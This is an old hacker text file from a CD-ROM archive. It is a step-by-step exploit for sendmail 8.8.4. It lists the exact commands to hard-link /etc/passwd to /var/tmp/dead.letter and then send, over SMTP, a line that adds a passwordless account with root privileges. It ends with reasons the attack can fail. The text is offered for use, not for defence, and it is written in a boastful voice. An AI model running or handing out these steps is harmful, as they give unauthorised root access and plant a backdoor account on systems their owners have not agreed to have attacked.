home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack / sm884.txt < prev    next >
Encoding:
Text File  |  1997-09-25  |  1.4 KB  |  36 lines
  1.                                 
  2.                          sendmail8.8.4 exploit 
  3.                            
  4. "sendmail? 'tis the bugiest program" -phriend-
  5.  
  6. Ok, here's a brief and interesting explonation of this famous exploit. This
  7. exploit uses sendmail version 8.8.4 and it requires that you have a shell
  8. acount on the server in question. The exploit creates a link from
  9. /etc/passwd to /var/tmp/dead.letter Very simple really. Here's how it
  10. works, below are the exact commands as you have to type them (for the
  11. technically challendged ones)
  12.  
  13.    * ln /etc/passwd /var/tmp/dead.letter
  14.    * telnet target.host 25
  15.    * mail from: nonexsistent@not.an.actual.host.com
  16.    * rcpt to: nonexsistent@not.as.actual.host.com
  17.    * data
  18.    * lord::0:0:leet shit:/root:/bin/bash
  19.    * .
  20.    * quit
  21.  
  22. Kaboom, you're done, telnet to port 23 and log in as lord, no password
  23. required. Thanx to a little bit of work we did, lord just happens to have
  24. the same priviledges as root.
  25.  
  26. There are a couple of reasons why this might not work.
  27.  
  28.   1. /var and / are different partitions (as you already know, you can't
  29.      make hard links between different partitions)
  30.   2. There is a postmaster account on a machine or mail alias, in which
  31.      case, your mail will end up there instead of being written to a
  32.      etc/passwd
  33.   3. /var/tmp doesn't exist or isn't publicly writable
  34.  
  35. Duncan Silver 
  36. www.hackersclub.com/uu